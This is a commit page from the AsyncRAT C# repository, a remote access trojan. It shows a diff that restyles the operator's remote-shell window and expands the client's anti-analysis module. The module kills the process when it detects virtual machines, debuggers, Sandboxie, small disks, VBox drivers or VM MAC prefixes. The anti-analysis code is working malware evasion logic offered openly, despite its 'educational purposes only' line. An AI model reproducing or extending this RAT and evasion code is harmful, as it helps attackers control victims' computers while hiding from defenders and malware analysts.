Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #31 from MrDevBot/master

Browse Source 
UI changes to the Remote Shell
This commit is contained in:
NYAN CAT 2019-05-21 15:51:14 +03:00 committed by GitHub
commit 3b4bd0dc05
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 788 additions and 704 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

147
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.Designer.cs generated
View File

@ -28,67 +28,100 @@
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout();
//
// richTextBox1
//
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.BackColor = System.Drawing.SystemColors.ControlText;
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ForeColor = System.Drawing.Color.White;
this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(800, 398);
this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = "";
//
// textBox1
//
this.textBox1.BackColor = System.Drawing.SystemColors.ControlText;
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.ForeColor = System.Drawing.Color.White;
this.textBox1.Location = new System.Drawing.Point(0, 424);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(800, 26);
this.textBox1.TabIndex = 1;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
//
// timer1
//
this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.SystemColors.ControlText;
this.ClientSize = new System.Drawing.Size(800, 450);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.richTextBox1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormShell";
this.Text = "FormShell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.ResumeLayout(false);
this.PerformLayout();
this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.panel1 = new System.Windows.Forms.Panel();
this.label1 = new System.Windows.Forms.Label();
this.panel1.SuspendLayout();
this.SuspendLayout();
//
// richTextBox1
//
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.BackColor = System.Drawing.Color.White;
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Margin = new System.Windows.Forms.Padding(2);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(533, 268);
this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = "";
//
// textBox1
//
this.textBox1.BackColor = System.Drawing.SystemColors.Window;
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.textBox1.Location = new System.Drawing.Point(69, 272);
this.textBox1.Margin = new System.Windows.Forms.Padding(2);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(464, 20);
this.textBox1.TabIndex = 1;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
//
// timer1
//
this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
// panel1
//
this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.panel1.Controls.Add(this.label1);
this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.panel1.Location = new System.Drawing.Point(0, 0);
this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(69, 292);
this.panel1.TabIndex = 2;
//
// label1
//
this.label1.AutoSize = true;
this.label1.ForeColor = System.Drawing.SystemColors.ActiveCaption;
this.label1.Location = new System.Drawing.Point(6, 274);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(60, 13);
this.label1.TabIndex = 0;
this.label1.Text = "Command :";
this.label1.Click += new System.EventHandler(this.Label1_Click);
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.ClientSize = new System.Drawing.Size(533, 292);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Margin = new System.Windows.Forms.Padding(2);
this.Name = "FormShell";
this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.Load += new System.EventHandler(this.FormShell_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();
}
#endregion
private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
private System.Windows.Forms.Label label1;
}
}

13
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.cs
View File

@ -4,6 +4,7 @@ using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Drawing;
using System.Linq;
using System.Text;
@ -56,6 +57,16 @@ namespace AsyncRAT_Sharp.Forms
private void Timer1_Tick(object sender, EventArgs e)
{
if (!C.ClientSocket.Connected) this.Close();
}
}
private void FormShell_Load(object sender, EventArgs e)
{
}
private void Label1_Click(object sender, EventArgs e)
{
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
}
}
}

1129
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormShell.resx
View File

File diff suppressed because it is too large Load Diff

203
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -1,67 +1,136 @@
using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
// │ Author : NYAN CAT
// │ Name : Anti Analysis v0.2
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Helper
{
class Anti_Analysis
{
public static void RunAntiAnalysis()
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null);
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}
using System;
using System.Diagnostics;
using System.Linq;
using System.Management;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
// │ Author : NYAN CAT
// │ Name : Anti Analysis v0.2
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Helper
{
class Anti_Analysis
{
private static long GB_50 = 50000000000;
public static void RunAntiAnalysis()
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null);
}
internal static bool SmallHDD()
{
// Method One - main drive smaller than 50gb, likely a VM
long driveSize = Methods.GetMainDriveSize();
if (driveSize <= GB_50 * 2)
return true;
// Method Two - has common card of virtual machine
//if (HasVMCard())
//return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
//if (GetUptime() < TimeSpan.FromMinutes(5))
//return true;
// Method Five - has VM mac address
if (HasVMMac())
return true;
return false;
}
private static bool HasVMMac()
{
var macAddr =
(
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString()
).FirstOrDefault();
var macs = new[]
{
"00-05-69",
"00:05:69",
"000569",
"00-50-56",
"00:50:56",
"005056",
"00-0C-29",
"00:0C:29",
"000C29",
"00-1C-14",
"00:1C:14",
"001C14",
"08-00-27",
"08:00:27",
"080027",
};
foreach (string mac in macs)
{
if (mac == macAddr)
return true;
}
return false;
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}